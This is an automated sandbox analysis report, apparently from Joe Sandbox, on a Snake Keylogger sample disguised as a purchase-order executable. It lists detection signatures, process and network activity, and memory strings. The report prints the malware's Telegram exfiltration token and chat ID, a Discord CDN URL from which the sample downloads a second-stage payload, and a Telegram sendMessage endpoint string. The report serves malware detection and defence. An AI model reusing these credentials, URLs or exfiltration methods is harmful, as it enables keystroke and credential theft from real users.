Play interactive tour

Edit tour

Analysis Report PURCHASE ORDER E3007921.EXE

Overview

General Information

Sample Name:	PURCHASE ORDER E3007921.EXE
Analysis ID:	410994
MD5:	dac3ac141a3e0abb27839284a1df864c
SHA1:	8802717f07d933b2478b0cae6f410cce79b9f0a9
SHA256:	9af68d42d1d36c20d81306679715a6f7e3d427d8c039344653f4ec6b43cd7ac5
Tags:	EXESnakeKeylogger
Infos:
Most interesting Screenshot:

Detection

Snake Keylogger

Score:	92
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Yara detected Snake Keylogger

Executable has a suspicious name (potential lure to open the executable)

Initial sample is a PE file and has a suspicious name

Injects a PE file into a foreign processes

Machine Learning detection for sample

May check the online IP address of the machine

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Mail credentials (via file access)

Yara detected Beds Obfuscator

Antivirus or Machine Learning detection for unpacked file

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains long sleeps (>= 3 min)

Creates a DirectInput object (often for capturing keystrokes)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Enables debug privileges

HTTP GET or POST without a user agent

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Uses insecure TLS / SSL version for HTTPS connection

Yara detected Credential Stealer

Classification

Startup

System is w10x64

PURCHASE ORDER E3007921.EXE (PID: 6848 cmdline: 'C:\Users\user\Desktop\PURCHASE ORDER E3007921.EXE' MD5: DAC3AC141A3E0ABB27839284A1DF864C)

PURCHASE ORDER E3007921.EXE (PID: 7024 cmdline: C:\Users\user\Desktop\PURCHASE ORDER E3007921.EXE MD5: DAC3AC141A3E0ABB27839284A1DF864C)

cleanup

Malware Configuration

Threatname: Snake Keylogger

{"Exfil Mode": "Telegram", "Telegram Info": {"Telegram ID": "1413771094", "Telegram Token": "1791466927:AAHD_mKnN05jD74hk8VEfBe-NORCSbM6oaM"}}

Yara Overview

Memory Dumps

Source	Rule	Description	Author
00000000.00000002.661938315.00000000028FD000.00000004.00000001.sdmp	JoeSecurity_BedsObfuscator	Yara detected Beds Obfuscator	Joe Security
00000003.00000002.920165617.0000000000402000.00000040.00000001.sdmp	JoeSecurity_BedsObfuscator	Yara detected Beds Obfuscator	Joe Security
00000003.00000002.920165617.0000000000402000.00000040.00000001.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
00000000.00000002.662061739.0000000003839000.00000004.00000001.sdmp	JoeSecurity_BedsObfuscator	Yara detected Beds Obfuscator	Joe Security
00000000.00000002.662061739.0000000003839000.00000004.00000001.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
00000000.00000002.661917531.00000000028D6000.00000004.00000001.sdmp	JoeSecurity_BedsObfuscator	Yara detected Beds Obfuscator	Joe Security
00000003.00000002.920981561.0000000002841000.00000004.00000001.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.662191831.00000000038BA000.00000004.00000001.sdmp	JoeSecurity_BedsObfuscator	Yara detected Beds Obfuscator	Joe Security
00000000.00000002.662191831.00000000038BA000.00000004.00000001.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
Process Memory Space: PURCHASE ORDER E3007921.EXE PID: 7024	JoeSecurity_BedsObfuscator	Yara detected Beds Obfuscator	Joe Security
Process Memory Space: PURCHASE ORDER E3007921.EXE PID: 7024	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
Process Memory Space: PURCHASE ORDER E3007921.EXE PID: 7024	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: PURCHASE ORDER E3007921.EXE PID: 6848	JoeSecurity_BedsObfuscator	Yara detected Beds Obfuscator	Joe Security
Process Memory Space: PURCHASE ORDER E3007921.EXE PID: 6848	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
Click to see the 9 entries

Unpacked PEs

Source	Rule	Description	Author
0.2.PURCHASE ORDER E3007921.EXE.28ddd68.3.unpack	JoeSecurity_BedsObfuscator	Yara detected Beds Obfuscator	Joe Security
0.2.PURCHASE ORDER E3007921.EXE.28ddd68.3.raw.unpack	JoeSecurity_BedsObfuscator	Yara detected Beds Obfuscator	Joe Security
0.2.PURCHASE ORDER E3007921.EXE.38ba990.5.unpack	JoeSecurity_BedsObfuscator	Yara detected Beds Obfuscator	Joe Security
0.2.PURCHASE ORDER E3007921.EXE.38ba990.5.unpack	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
3.2.PURCHASE ORDER E3007921.EXE.400000.0.unpack	JoeSecurity_BedsObfuscator	Yara detected Beds Obfuscator	Joe Security
3.2.PURCHASE ORDER E3007921.EXE.400000.0.unpack	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
0.2.PURCHASE ORDER E3007921.EXE.3839530.4.raw.unpack	JoeSecurity_BedsObfuscator	Yara detected Beds Obfuscator	Joe Security
0.2.PURCHASE ORDER E3007921.EXE.3839530.4.raw.unpack	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
0.2.PURCHASE ORDER E3007921.EXE.38ba990.5.raw.unpack	JoeSecurity_BedsObfuscator	Yara detected Beds Obfuscator	Joe Security
0.2.PURCHASE ORDER E3007921.EXE.38ba990.5.raw.unpack	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
Click to see the 5 entries

Sigma Overview

No Sigma rule has matched

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Found malware configuration

Show sources

Source: 00000000.00000002.662191831.00000000038BA000.00000004.00000001.sdmp

Malware Configuration Extractor: Snake Keylogger {"Exfil Mode": "Telegram", "Telegram Info": {"Telegram ID": "1413771094", "Telegram Token": "1791466927:AAHD_mKnN05jD74hk8VEfBe-NORCSbM6oaM"}}

Machine Learning detection for sample

Show sources

Source: PURCHASE ORDER E3007921.EXE

Joe Sandbox ML: detected

Source: 3.2.PURCHASE ORDER E3007921.EXE.400000.0.unpack

Avira: Label: TR/Spy.Gen

Source: PURCHASE ORDER E3007921.EXE

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE

Source: unknown	HTTPS traffic detected: 162.159.135.233:443 -> 192.168.2.4:49736 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 172.67.188.154:443 -> 192.168.2.4:49746 version: TLS 1.0

Source: PURCHASE ORDER E3007921.EXE

Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Source:

Binary string: C:\Users\AMD RYZEN 3\Desktop\calmclientandserver\obj\Debug\IsolatedStorage.pdb source: PURCHASE ORDER E3007921.EXE, 00000000.00000002.662061739.0000000003839000.00000004.00000001.sdmp

Networking:

May check the online IP address of the machine

Show sources

Source: C:\Users\user\Desktop\PURCHASE ORDER E3007921.EXE	DNS query: name: checkip.dyndns.org
Source: C:\Users\user\Desktop\PURCHASE ORDER E3007921.EXE	DNS query: name: checkip.dyndns.org
Source: C:\Users\user\Desktop\PURCHASE ORDER E3007921.EXE	DNS query: name: checkip.dyndns.org
Source: C:\Users\user\Desktop\PURCHASE ORDER E3007921.EXE	DNS query: name: checkip.dyndns.org

Source: global traffic

HTTP traffic detected: GET /attachments/809311531652087809/839820005927550996/Youngest_Snake.exe HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive

Source: Joe Sandbox View

IP Address: 162.88.193.70 162.88.193.70

Source: Joe Sandbox View

JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org

Source: unknown	HTTPS traffic detected: 162.159.135.233:443 -> 192.168.2.4:49736 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 172.67.188.154:443 -> 192.168.2.4:49746 version: TLS 1.0

Source: global traffic	HTTP traffic detected: GET /attachments/809311531652087809/839820005927550996/Youngest_Snake.exe HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org

Source: unknown

DNS traffic detected: queries for: cdn.discordapp.com

Source: PURCHASE ORDER E3007921.EXE, 00000003.00000002.921086444.00000000028F6000.00000004.00000001.sdmp	String found in binary or memory: http://cacerts.digicert.com/CloudflareIncECCCA-3.crt0
Source: PURCHASE ORDER E3007921.EXE, 00000000.00000002.661870053.000000000287D000.00000004.00000001.sdmp	String found in binary or memory: http://cacerts.digicert.com/CloudflareIncRSACA-2.crt0
Source: PURCHASE ORDER E3007921.EXE, 00000000.00000002.661870053.000000000287D000.00000004.00000001.sdmp	String found in binary or memory: http://cdn.discordapp.com
Source: PURCHASE ORDER E3007921.EXE, 00000000.00000002.661791074.0000000002811000.00000004.00000001.sdmp	String found in binary or memory: http://cdn.discordapp.com/attachments/809311531652087809/839820005927550996/Youngest_Snake.exe
Source: PURCHASE ORDER E3007921.EXE	String found in binary or memory: http://cdn.discordapp.com/attachments/809311531652087809/839820005927550996/Youngest_Snake.exeJ
Source: PURCHASE ORDER E3007921.EXE, 00000000.00000002.661909146.00000000028C2000.00000004.00000001.sdmp	String found in binary or memory: http://cdn.discordapp.com4Tkp~
Source: PURCHASE ORDER E3007921.EXE, 00000003.00000002.921086444.00000000028F6000.00000004.00000001.sdmp	String found in binary or memory: http://checkip.dyndns.com
Source: PURCHASE ORDER E3007921.EXE, 00000003.00000002.921086444.00000000028F6000.00000004.00000001.sdmp	String found in binary or memory: http://checkip.dyndns.org
Source: PURCHASE ORDER E3007921.EXE, 00000003.00000002.920981561.0000000002841000.00000004.00000001.sdmp	String found in binary or memory: http://checkip.dyndns.org/
Source: PURCHASE ORDER E3007921.EXE, 00000003.00000002.920981561.0000000002841000.00000004.00000001.sdmp	String found in binary or memory: http://checkip.dyndns.org/HB
Source: PURCHASE ORDER E3007921.EXE, 00000003.00000002.920981561.0000000002841000.00000004.00000001.sdmp	String found in binary or memory: http://checkip.dyndns.org4Tk
Source: PURCHASE ORDER E3007921.EXE, 00000003.00000002.921086444.00000000028F6000.00000004.00000001.sdmp	String found in binary or memory: http://checkip.dyndns.orgD8Tk
Source: PURCHASE ORDER E3007921.EXE, 00000003.00000002.921086444.00000000028F6000.00000004.00000001.sdmp	String found in binary or memory: http://crl3.digicert.com/CloudflareIncECCCA-3.crl07
Source: PURCHASE ORDER E3007921.EXE, 00000000.00000002.661870053.000000000287D000.00000004.00000001.sdmp	String found in binary or memory: http://crl3.digicert.com/CloudflareIncRSACA-2.crl07
Source: PURCHASE ORDER E3007921.EXE, 00000000.00000002.661870053.000000000287D000.00000004.00000001.sdmp, PURCHASE ORDER E3007921.EXE, 00000003.00000002.921086444.00000000028F6000.00000004.00000001.sdmp	String found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0m
Source: PURCHASE ORDER E3007921.EXE, 00000003.00000002.921086444.00000000028F6000.00000004.00000001.sdmp	String found in binary or memory: http://crl4.digicert.com/CloudflareIncECCCA-3.crl0L
Source: PURCHASE ORDER E3007921.EXE, 00000000.00000002.661870053.000000000287D000.00000004.00000001.sdmp	String found in binary or memory: http://crl4.digicert.com/CloudflareIncRSACA-2.crl0
Source: PURCHASE ORDER E3007921.EXE, 00000003.00000002.921086444.00000000028F6000.00000004.00000001.sdmp	String found in binary or memory: http://freegeoip.app
Source: PURCHASE ORDER E3007921.EXE, 00000000.00000002.661870053.000000000287D000.00000004.00000001.sdmp, PURCHASE ORDER E3007921.EXE, 00000003.00000002.921086444.00000000028F6000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.digicert.com0
Source: PURCHASE ORDER E3007921.EXE, 00000000.00000002.661870053.000000000287D000.00000004.00000001.sdmp, PURCHASE ORDER E3007921.EXE, 00000003.00000002.921086444.00000000028F6000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.digicert.com0:
Source: PURCHASE ORDER E3007921.EXE, 00000000.00000002.661803714.000000000281C000.00000004.00000001.sdmp, PURCHASE ORDER E3007921.EXE, 00000003.00000002.920981561.0000000002841000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: PURCHASE ORDER E3007921.EXE, 00000000.00000002.661870053.000000000287D000.00000004.00000001.sdmp	String found in binary or memory: http://www.digicert.com/CPS0v
Source: PURCHASE ORDER E3007921.EXE, 00000003.00000002.920981561.0000000002841000.00000004.00000001.sdmp	String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=Createutf-8
Source: PURCHASE ORDER E3007921.EXE, 00000000.00000002.661917531.00000000028D6000.00000004.00000001.sdmp	String found in binary or memory: https://cdn.discordapp.com
Source: PURCHASE ORDER E3007921.EXE, 00000000.00000002.661870053.000000000287D000.00000004.00000001.sdmp, PURCHASE ORDER E3007921.EXE, 00000000.00000002.661917531.00000000028D6000.00000004.00000001.sdmp	String found in binary or memory: https://cdn.discordapp.com/attachments/809311531652087809/839820005927550996/Youngest_Snake.exe
Source: PURCHASE ORDER E3007921.EXE, 00000000.00000002.661791074.0000000002811000.00000004.00000001.sdmp	String found in binary or memory: https://cdn.discordapp.com/attachments/841595401253158954/841595626680221726/asd
Source: PURCHASE ORDER E3007921.EXE	String found in binary or memory: https://cdn.discordapp.com/attachments/841595401253158954/841595626680221726/asd;IsolatedStorage.pac
Source: PURCHASE ORDER E3007921.EXE, 00000000.00000002.661803714.000000000281C000.00000004.00000001.sdmp	String found in binary or memory: https://cdn.discordapp.com4Tk
Source: PURCHASE ORDER E3007921.EXE, 00000003.00000002.921086444.00000000028F6000.00000004.00000001.sdmp	String found in binary or memory: https://freegeoip.app
Source: PURCHASE ORDER E3007921.EXE, 00000003.00000002.921086444.00000000028F6000.00000004.00000001.sdmp	String found in binary or memory: https://freegeoip.app/xml/
Source: PURCHASE ORDER E3007921.EXE, 00000003.00000002.921086444.00000000028F6000.00000004.00000001.sdmp	String found in binary or memory: https://freegeoip.app/xml/84.17.52.78
Source: PURCHASE ORDER E3007921.EXE, 00000003.00000002.921086444.00000000028F6000.00000004.00000001.sdmp	String found in binary or memory: https://freegeoip.app/xml/84.17.52.78x
Source: PURCHASE ORDER E3007921.EXE, 00000003.00000002.920981561.0000000002841000.00000004.00000001.sdmp	String found in binary or memory: https://freegeoip.app/xml/LoadCountryNameClipboard
Source: PURCHASE ORDER E3007921.EXE, 00000003.00000002.921086444.00000000028F6000.00000004.00000001.sdmp	String found in binary or memory: https://freegeoip.app4Tk
Source: PURCHASE ORDER E3007921.EXE, 00000000.00000002.661870053.000000000287D000.00000004.00000001.sdmp, PURCHASE ORDER E3007921.EXE, 00000000.00000002.661917531.00000000028D6000.00000004.00000001.sdmp, PURCHASE ORDER E3007921.EXE, 00000003.00000002.921086444.00000000028F6000.00000004.00000001.sdmp, PURCHASE ORDER E3007921.EXE, 00000003.00000002.921133932.0000000002924000.00000004.00000001.sdmp	String found in binary or memory: https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct
Source: PURCHASE ORDER E3007921.EXE, 00000000.00000002.661870053.000000000287D000.00000004.00000001.sdmp, PURCHASE ORDER E3007921.EXE, 00000003.00000002.921086444.00000000028F6000.00000004.00000001.sdmp	String found in binary or memory: https://www.digicert.com/CPS0

Source: unknown	Network traffic detected: HTTP traffic on port 49746 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49746

Source: PURCHASE ORDER E3007921.EXE, 00000000.00000002.661605386.0000000000C18000.00000004.00000020.sdmp

Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

System Summary:

Executable has a suspicious name (potential lure to open the executable)

Show sources

Source: PURCHASE ORDER E3007921.EXE

Static file information: Suspicious name

Initial sample is a PE file and has a suspicious name

Show sources

Source: initial sample

Static PE information: Filename: PURCHASE ORDER E3007921.EXE

Source: C:\Users\user\Desktop\PURCHASE ORDER E3007921.EXE	Code function: 0_2_00BF2148	0_2_00BF2148
Source: C:\Users\user\Desktop\PURCHASE ORDER E3007921.EXE	Code function: 0_2_00452050	0_2_00452050
Source: C:\Users\user\Desktop\PURCHASE ORDER E3007921.EXE	Code function: 3_2_00E781D0	3_2_00E781D0
Source: C:\Users\user\Desktop\PURCHASE ORDER E3007921.EXE	Code function: 3_2_00E70598	3_2_00E70598
Source: C:\Users\user\Desktop\PURCHASE ORDER E3007921.EXE	Code function: 3_2_00E74650	3_2_00E74650
Source: C:\Users\user\Desktop\PURCHASE ORDER E3007921.EXE	Code function: 3_2_00E7B2D0	3_2_00E7B2D0
Source: C:\Users\user\Desktop\PURCHASE ORDER E3007921.EXE	Code function: 3_2_00E77BA9	3_2_00E77BA9
Source: C:\Users\user\Desktop\PURCHASE ORDER E3007921.EXE	Code function: 3_2_00E70AB0	3_2_00E70AB0
Source: C:\Users\user\Desktop\PURCHASE ORDER E3007921.EXE	Code function: 3_2_00E70FC8	3_2_00E70FC8
Source: C:\Users\user\Desktop\PURCHASE ORDER E3007921.EXE	Code function: 3_2_00E75A00	3_2_00E75A00
Source: C:\Users\user\Desktop\PURCHASE ORDER E3007921.EXE	Code function: 3_2_05F427C8	3_2_05F427C8
Source: C:\Users\user\Desktop\PURCHASE ORDER E3007921.EXE	Code function: 3_2_05F44740	3_2_05F44740
Source: C:\Users\user\Desktop\PURCHASE ORDER E3007921.EXE	Code function: 3_2_05F40040	3_2_05F40040
Source: C:\Users\user\Desktop\PURCHASE ORDER E3007921.EXE	Code function: 3_2_05F42FD8	3_2_05F42FD8
Source: C:\Users\user\Desktop\PURCHASE ORDER E3007921.EXE	Code function: 3_2_05F44F28	3_2_05F44F28
Source: C:\Users\user\Desktop\PURCHASE ORDER E3007921.EXE	Code function: 3_2_05F40828	3_2_05F40828
Source: C:\Users\user\Desktop\PURCHASE ORDER E3007921.EXE	Code function: 3_2_05F417F8	3_2_05F417F8
Source: C:\Users\user\Desktop\PURCHASE ORDER E3007921.EXE	Code function: 3_2_05F437C0	3_2_05F437C0
Source: C:\Users\user\Desktop\PURCHASE ORDER E3007921.EXE	Code function: 3_2_05F41010	3_2_05F41010
Source: C:\Users\user\Desktop\PURCHASE ORDER E3007921.EXE	Code function: 3_2_05F41FE0	3_2_05F41FE0
Source: C:\Users\user\Desktop\PURCHASE ORDER E3007921.EXE	Code function: 3_2_05F43FA8	3_2_05F43FA8
Source: C:\Users\user\Desktop\PURCHASE ORDER E3007921.EXE	Code function: 3_2_05F407C9	3_2_05F407C9
Source: C:\Users\user\Desktop\PURCHASE ORDER E3007921.EXE	Code function: 3_2_05F44790	3_2_05F44790
Source: C:\Users\user\Desktop\PURCHASE ORDER E3007921.EXE	Code function: 3_2_05F42768	3_2_05F42768
Source: C:\Users\user\Desktop\PURCHASE ORDER E3007921.EXE	Code function: 3_2_05F40007	3_2_05F40007
Source: C:\Users\user\Desktop\PURCHASE ORDER E3007921.EXE	Code function: 3_2_05F40FB0	3_2_05F40FB0
Source: C:\Users\user\Desktop\PURCHASE ORDER E3007921.EXE	Code function: 3_2_05F42F79	3_2_05F42F79
Source: C:\Users\user\Desktop\PURCHASE ORDER E3007921.EXE	Code function: 3_2_05F44F19	3_2_05F44F19
Source: C:\Users\user\Desktop\PURCHASE ORDER E3007921.EXE	Code function: 3_2_05F41799	3_2_05F41799
Source: C:\Users\user\Desktop\PURCHASE ORDER E3007921.EXE	Code function: 3_2_05F43761	3_2_05F43761
Source: C:\Users\user\Desktop\PURCHASE ORDER E3007921.EXE	Code function: 3_2_05F41F81	3_2_05F41F81
Source: C:\Users\user\Desktop\PURCHASE ORDER E3007921.EXE	Code function: 3_2_05F43F49	3_2_05F43F49
Source: C:\Users\user\Desktop\PURCHASE ORDER E3007921.EXE	Code function: 3_2_05F7BDF8	3_2_05F7BDF8
Source: C:\Users\user\Desktop\PURCHASE ORDER E3007921.EXE	Code function: 3_2_05F70040	3_2_05F70040
Source: C:\Users\user\Desktop\PURCHASE ORDER E3007921.EXE	Code function: 3_2_05F72FF8	3_2_05F72FF8
Source: C:\Users\user\Desktop\PURCHASE ORDER E3007921.EXE	Code function: 3_2_05F737E0	3_2_05F737E0
Source: C:\Users\user\Desktop\PURCHASE ORDER E3007921.EXE	Code function: 3_2_05F7D7E0	3_2_05F7D7E0
Source: C:\Users\user\Desktop\PURCHASE ORDER E3007921.EXE	Code function: 3_2_05F73FC8	3_2_05F73FC8
Source: C:\Users\user\Desktop\PURCHASE ORDER E3007921.EXE	Code function: 3_2_05F747B0	3_2_05F747B0
Source: C:\Users\user\Desktop\PURCHASE ORDER E3007921.EXE	Code function: 3_2_05F74F98	3_2_05F74F98
Source: C:\Users\user\Desktop\PURCHASE ORDER E3007921.EXE	Code function: 3_2_05F75780	3_2_05F75780
Source: C:\Users\user\Desktop\PURCHASE ORDER E3007921.EXE	Code function: 3_2_05F75F68	3_2_05F75F68
Source: C:\Users\user\Desktop\PURCHASE ORDER E3007921.EXE	Code function: 3_2_05F7EB68	3_2_05F7EB68
Source: C:\Users\user\Desktop\PURCHASE ORDER E3007921.EXE	Code function: 3_2_05F7F318	3_2_05F7F318
Source: C:\Users\user\Desktop\PURCHASE ORDER E3007921.EXE	Code function: 3_2_05F76700	3_2_05F76700
Source: C:\Users\user\Desktop\PURCHASE ORDER E3007921.EXE	Code function: 3_2_05F76EE8	3_2_05F76EE8
Source: C:\Users\user\Desktop\PURCHASE ORDER E3007921.EXE	Code function: 3_2_05F776D0	3_2_05F776D0
Source: C:\Users\user\Desktop\PURCHASE ORDER E3007921.EXE	Code function: 3_2_05F77EB8	3_2_05F77EB8
Source: C:\Users\user\Desktop\PURCHASE ORDER E3007921.EXE	Code function: 3_2_05F786A0	3_2_05F786A0
Source: C:\Users\user\Desktop\PURCHASE ORDER E3007921.EXE	Code function: 3_2_05F78E88	3_2_05F78E88
Source: C:\Users\user\Desktop\PURCHASE ORDER E3007921.EXE	Code function: 3_2_05F79670	3_2_05F79670
Source: C:\Users\user\Desktop\PURCHASE ORDER E3007921.EXE	Code function: 3_2_05F79E58	3_2_05F79E58
Source: C:\Users\user\Desktop\PURCHASE ORDER E3007921.EXE	Code function: 3_2_05F7A640	3_2_05F7A640
Source: C:\Users\user\Desktop\PURCHASE ORDER E3007921.EXE	Code function: 3_2_05F7C638	3_2_05F7C638
Source: C:\Users\user\Desktop\PURCHASE ORDER E3007921.EXE	Code function: 3_2_05F7CE20	3_2_05F7CE20
Source: C:\Users\user\Desktop\PURCHASE ORDER E3007921.EXE	Code function: 3_2_05F7AE28	3_2_05F7AE28
Source: C:\Users\user\Desktop\PURCHASE ORDER E3007921.EXE	Code function: 3_2_05F7B610	3_2_05F7B610
Source: C:\Users\user\Desktop\PURCHASE ORDER E3007921.EXE	Code function: 3_2_05F79DFA	3_2_05F79DFA
Source: C:\Users\user\Desktop\PURCHASE ORDER E3007921.EXE	Code function: 3_2_05F7A5E0	3_2_05F7A5E0
Source: C:\Users\user\Desktop\PURCHASE ORDER E3007921.EXE	Code function: 3_2_05F7CDC1	3_2_05F7CDC1
Source: C:\Users\user\Desktop\PURCHASE ORDER E3007921.EXE	Code function: 3_2_05F7ADC9	3_2_05F7ADC9
Source: C:\Users\user\Desktop\PURCHASE ORDER E3007921.EXE	Code function: 3_2_05F7B5B2	3_2_05F7B5B2
Source: C:\Users\user\Desktop\PURCHASE ORDER E3007921.EXE	Code function: 3_2_05F7BD99	3_2_05F7BD99
Source: C:\Users\user\Desktop\PURCHASE ORDER E3007921.EXE	Code function: 3_2_05F7C588	3_2_05F7C588
Source: C:\Users\user\Desktop\PURCHASE ORDER E3007921.EXE	Code function: 3_2_05F70007	3_2_05F70007
Source: C:\Users\user\Desktop\PURCHASE ORDER E3007921.EXE	Code function: 3_2_05F72FE9	3_2_05F72FE9
Source: C:\Users\user\Desktop\PURCHASE ORDER E3007921.EXE	Code function: 3_2_05F7D7D1	3_2_05F7D7D1
Source: C:\Users\user\Desktop\PURCHASE ORDER E3007921.EXE	Code function: 3_2_05F73780	3_2_05F73780
Source: C:\Users\user\Desktop\PURCHASE ORDER E3007921.EXE	Code function: 3_2_05F73F69	3_2_05F73F69
Source: C:\Users\user\Desktop\PURCHASE ORDER E3007921.EXE	Code function: 3_2_05F76750	3_2_05F76750
Source: C:\Users\user\Desktop\PURCHASE ORDER E3007921.EXE	Code function: 3_2_05F74750	3_2_05F74750
Source: C:\Users\user\Desktop\PURCHASE ORDER E3007921.EXE	Code function: 3_2_05F74F38	3_2_05F74F38
Source: C:\Users\user\Desktop\PURCHASE ORDER E3007921.EXE	Code function: 3_2_05F75721	3_2_05F75721
Source: C:\Users\user\Desktop\PURCHASE ORDER E3007921.EXE	Code function: 3_2_05F75F08	3_2_05F75F08
Source: C:\Users\user\Desktop\PURCHASE ORDER E3007921.EXE	Code function: 3_2_05F76ED7	3_2_05F76ED7
Source: C:\Users\user\Desktop\PURCHASE ORDER E3007921.EXE	Code function: 3_2_05F7EAB9	3_2_05F7EAB9
Source: C:\Users\user\Desktop\PURCHASE ORDER E3007921.EXE	Code function: 3_2_05F77671	3_2_05F77671
Source: C:\Users\user\Desktop\PURCHASE ORDER E3007921.EXE	Code function: 3_2_05F7F268	3_2_05F7F268
Source: C:\Users\user\Desktop\PURCHASE ORDER E3007921.EXE	Code function: 3_2_05F77E5A	3_2_05F77E5A
Source: C:\Users\user\Desktop\PURCHASE ORDER E3007921.EXE	Code function: 3_2_05F78641	3_2_05F78641
Source: C:\Users\user\Desktop\PURCHASE ORDER E3007921.EXE	Code function: 3_2_05F78E28	3_2_05F78E28
Source: C:\Users\user\Desktop\PURCHASE ORDER E3007921.EXE	Code function: 3_2_05F79610	3_2_05F79610
Source: C:\Users\user\Desktop\PURCHASE ORDER E3007921.EXE	Code function: 3_2_004F2050	3_2_004F2050

Source: PURCHASE ORDER E3007921.EXE, 00000000.00000002.661938315.00000000028FD000.00000004.00000001.sdmp	Binary or memory string: OriginalFilename7SDM2KY4.exe4 vs PURCHASE ORDER E3007921.EXE
Source: PURCHASE ORDER E3007921.EXE, 00000000.00000002.661605386.0000000000C18000.00000004.00000020.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs PURCHASE ORDER E3007921.EXE
Source: PURCHASE ORDER E3007921.EXE, 00000000.00000002.662061739.0000000003839000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameIsolatedStorage.dll@ vs PURCHASE ORDER E3007921.EXE
Source: PURCHASE ORDER E3007921.EXE, 00000000.00000000.656419307.0000000000458000.00000002.00020000.sdmp	Binary or memory string: OriginalFilenameyounglog.exeP vs PURCHASE ORDER E3007921.EXE
Source: PURCHASE ORDER E3007921.EXE, 00000000.00000002.663905890.00000000058D0000.00000002.00000001.sdmp	Binary or memory string: OriginalFilenameKernelbase.dll.muij% vs PURCHASE ORDER E3007921.EXE
Source: PURCHASE ORDER E3007921.EXE, 00000003.00000002.920375493.0000000000900000.00000002.00000001.sdmp	Binary or memory string: OriginalFilenameCRYPT32.DLL.MUIj% vs PURCHASE ORDER E3007921.EXE
Source: PURCHASE ORDER E3007921.EXE, 00000003.00000002.920353516.00000000008F6000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameUNKNOWN_FILET vs PURCHASE ORDER E3007921.EXE
Source: PURCHASE ORDER E3007921.EXE, 00000003.00000002.920276893.00000000004F8000.00000002.00020000.sdmp	Binary or memory string: OriginalFilenameyounglog.exeP vs PURCHASE ORDER E3007921.EXE
Source: PURCHASE ORDER E3007921.EXE, 00000003.00000002.920219531.0000000000466000.00000040.00000001.sdmp	Binary or memory string: OriginalFilename7SDM2KY4.exe4 vs PURCHASE ORDER E3007921.EXE
Source: PURCHASE ORDER E3007921.EXE	Binary or memory string: OriginalFilenameyounglog.exeP vs PURCHASE ORDER E3007921.EXE

Source: PURCHASE ORDER E3007921.EXE

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE

Source: classification engine

Classification label: mal92.troj.spyw.evad.winEXE@3/1@5/4

Source: C:\Users\user\Desktop\PURCHASE ORDER E3007921.EXE

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\PURCHASE ORDER E3007921.EXE.log

Jump to behavior

Source: PURCHASE ORDER E3007921.EXE

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\PURCHASE ORDER E3007921.EXE	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll			Jump to behavior
